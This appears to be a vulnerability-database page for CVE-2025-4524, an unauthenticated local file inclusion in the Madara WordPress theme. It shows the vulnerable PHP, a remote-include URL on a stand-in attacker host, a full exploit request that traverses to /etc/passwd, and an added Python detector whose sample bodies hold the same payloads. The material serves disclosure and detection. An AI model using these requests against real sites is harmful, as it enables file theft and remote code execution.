Related vulnerability
Title:
WordPress plugin Madara path traversal vulnerability
(CVE-2025-4524)
Description: WordPress and WordPress plugin are products of the WordPress Foundation. WordPress is a blogging platform developed in PHP that lets users host a personal blog on a server running PHP and MySQL. WordPress plugin is an application plugin. WordPress plugin Madara 2.2.2 and earlier versions contain a path traversal vulnerability: the `template` parameter leads to local file inclusion, which may allow arbitrary code execution.
Description
CVE-2025-4524 - Unauthenticated madara-core WordPress theme LFI
Introduction
# CVE-2025-4524 - Unauthenticated madara-core WordPress theme LFI
[WordFence link](https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-themes/madara/madara-responsive-and-modern-wordpress-theme-for-manga-sites-222-unauthenticated-local-file-inclusion)
## Description
A vulnerability lies in `madara`'s `madara_load_more` AJAX action, where the `template` parameter is taken unchanged from the user request and passed to PHP's `include` function.
## Vulnerability
The vulnerable code is as follows:
```php
add_action( 'wp_ajax_madara_load_more', array( $this, 'ajax_load_next_page' ) );
// the nopriv hook makes the action reachable without authentication
add_action( 'wp_ajax_nopriv_madara_load_more', array( $this, 'ajax_load_next_page' ) );
...
function ajax_load_next_page() {
    ...
    if ( $query->have_posts() ) {
        while ( $query->have_posts() ) {
            $query->the_post();
            $madara_loop_index ++;
            set_query_var( 'madara_loop_index', $madara_loop_index );
            if ( $madara_loop_index < $posts_per_page + 1 ) {
                // $template comes straight from the request; only the presence of the
                // substring 'plugins' is checked, not the path itself
                if ( ( strpos( $template, 'plugins' ) !== false ) ) {
                    include( $template ); // we are in wp-content\themes\madara\app\{plugins} VULN
                } else {
                    //$post_format = get_post_format() ? get_post_format : '';
                    get_template_part( $template, get_post_format() );
                }
            }
        }
        if ( $query->post_count <= $posts_per_page ) {
            // there are no more posts
            // print a flag to detect
            echo '<div class="invi no-posts"><!-- --></div>';
        }
    } else {
        // no posts found
    }
    /* Restore original Post Data */
    wp_reset_postdata();
    die( '' );
}
```
On each successful query of `madara_load_more`, the template named by the `template` parameter is rendered for every result. If the string `plugins` appears anywhere in `template`, the value is passed as is to `include`; otherwise WordPress resolves it through `get_template_part`.
This allows arbitrary files to be included, either as a remote URL such as `https://evilsite.com/plugins/evil.php` when `allow_url_include` is enabled, or through path traversal. Since the current directory while this action runs is `wp-content/themes/madara/app/`, where a `plugins` directory exists, a value such as `plugins/../../../../../wp-content/uploads/evil.png` satisfies the substring check and traverses out of the theme directory.
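As an added example that is not part of the original PoC repository, the following detection logic classifies `admin-ajax.php` POST bodies for this action. The request bodies are constructed to mirror the request shape shown on this page; it assumes a log source that records one URL-encoded body per line.

```python
import re
from typing import Optional
from urllib.parse import parse_qs, unquote

# Constructed sample POST bodies (one per line, as a WAF or access log with
# request-body logging might record them).
SAMPLE_BODIES = [
    # benign load-more call: template resolved via get_template_part()
    "action=madara_load_more&page=2&template=madara-core/content/content-archive&vars%5Bpaged%5D=2",
    # 'plugins' substring forces the raw include() branch, then traverses out
    "action=madara_load_more&page=1&template=plugins/../../../../../../../etc/passwd&vars%5Bpaged%5D=1",
    # remote include attempt (only effective when allow_url_include is on)
    "action=madara_load_more&page=1&template=http%3A%2F%2Fevilsite.example%2Fplugins%2Fevil.php",
    # double URL-encoded traversal, to check the normalisation step
    "action=madara_load_more&template=plugins%252F..%252F..%252Fwp-content%252Fuploads%252Fx.png",
    # unrelated AJAX action, must be ignored
    "action=heartbeat&_nonce=abc",
]

# '..' as a whole path component, with either slash style
TRAVERSAL = re.compile(r"(^|[\\/])\.\.([\\/]|$)")
# a URL scheme prefix such as http:// or php://
SCHEME = re.compile(r"^[a-z][a-z0-9+.-]*://", re.I)


def classify_template(body: str) -> Optional[str]:
    """Return a finding label for a madara_load_more body, or None if benign.

    parse_qs decodes once; the extra unquote() calls normalise double-encoded
    values so '%252F' is compared as '/' rather than slipping past the regexes.
    """
    params = parse_qs(body, keep_blank_values=True)
    if params.get("action", [""])[0] != "madara_load_more":
        return None
    template = unquote(unquote(params.get("template", [""])[0]))
    if SCHEME.match(template):
        return "remote-include"
    if "plugins" in template and TRAVERSAL.search(template):
        return "path-traversal"
    if "plugins" in template:
        # raw include() branch reached without traversal; lower-confidence signal
        return "direct-include"
    return None


def scan(bodies):
    """Yield (line index, label) for every body that produced a finding."""
    findings = [(i, classify_template(b)) for i, b in enumerate(bodies)]
    return [(i, label) for i, label in findings if label is not None]
```

Running `scan(SAMPLE_BODIES)` flags lines 1 to 3 and leaves the benign load-more call and the heartbeat untouched.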
## Exploit
Exploitation depends on the `allow_url_include` setting.
If it is enabled, a malicious actor can set up an HTTP server that replies with a malicious PHP script upon reception of a request whose path contains the string `plugins`.
If it is disabled, a malicious actor can upload a file containing PHP code (in image EXIF metadata, image pixel data, etc.) through other means on the WordPress instance and include that file. The image data itself is not interpreted as PHP; only the code between PHP tags is.
This can lead to RCE or LFI.

```http
POST /wp-admin/admin-ajax.php HTTP/2
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 490

action=madara_load_more&page=1&template=plugins/../../../../../../../etc/passwd&vars%5Borderby%5D=meta_value_num&vars%5Bpaged%5D=1&vars%5Btimerange%5D=&vars%5Bposts_per_page%5D=16&vars%5Btax_query%5D%5Brelation%5D=OR&vars%5Bmeta_query%5D%5B0%5D%5Brelation%5D=AND&vars%5Bmeta_query%5D%5Brelation%5D=AND&vars%5Bpost_type%5D=wp-manga&vars%5Bpost_status%5D=publish&vars%5Bmeta_key%5D=_latest_update&vars%5Border%5D=desc&vars%5Bsidebar%5D=right&vars%5Bmanga_archives_item_layout%5D=big_thumbnail
```
File snapshot
[4.0K] /data/pocs/4b5f868e32c51f2555ad5bf900aecc261f5e71fc
├── [4.4K] poc.py
└── [3.8K] README.md
0 directories, 2 files
Notes
1. It is recommended to access the PoC through its original source first.
2. If the source is no longer available or cannot be reached, send an email to f.jinxu#gmail.com to request a local snapshot (replace # with @).
3. Shenlong has taken a snapshot of the POC code for you; to support long-term maintenance, please consider paying for the local POC. Thank you for your support.